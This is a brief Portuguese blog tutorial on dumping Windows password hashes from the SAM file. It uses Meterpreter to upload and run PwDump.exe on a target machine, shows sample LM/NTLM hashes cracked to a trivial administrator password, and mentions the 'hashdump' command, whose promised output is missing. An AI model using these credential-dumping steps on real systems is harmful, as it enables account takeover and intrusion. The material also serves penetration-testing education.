EXTRAIR HASH DO WINDOWS – “PWDUMP” E “HASHDUMP”

A fim de quebrar senhas você deve primeiro obter os hashes armazenados dentro do sistema operacional,essas hashes são armazenados no arquivo do Windows SAM. Esse arquivo está localizado em seu sistema em C:\Windows\System32\config, não é acessível enquanto o sistema operacional é inicializado, irei retratar dois modos para pegar essas hash(existem outros).

1º –  usando o QuarksPwDump_v0.2b.zip para extrair as hash de sistemas operacionais Windows(XP/2003/Vista/ 7/2008/8) suas opções são:

Com os devidos privilégios no sistema podemos executar os seguintes comandos no meterpreter para fazer o upload do pwdump na maquina alvo:

meterpreter > upload /root/Downloads/PwDump.exe c:\\windows\\system32\\

meterpreter > shell
C:\WINDOWS\system32> PwDump.exe –dump-hash-local

Como pode ser visto acima extraímos as hashes, composto pelo seguinte formato :

Username:RID:LMHash:NTLMHash:::

LM      ccf9155e3e7db453aad3b435b51404ee
NTLM      3dbde697d71690a769204beb12283678

Podemos usar bruteforce para conseguir a senha, algumas pessoas deixam senhas mais fáceis, basta pesquisar no google que temos alguns resultados no caso dessas hashs são fáceis: LM e NTLM , no caso nossa senha de administrador é : 123

2º – a outra forma é usar um simples comando do meterpreter “hashdump” veja abaixo:

Post simples aparentemente, mas resolvi compartilhar. 0/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s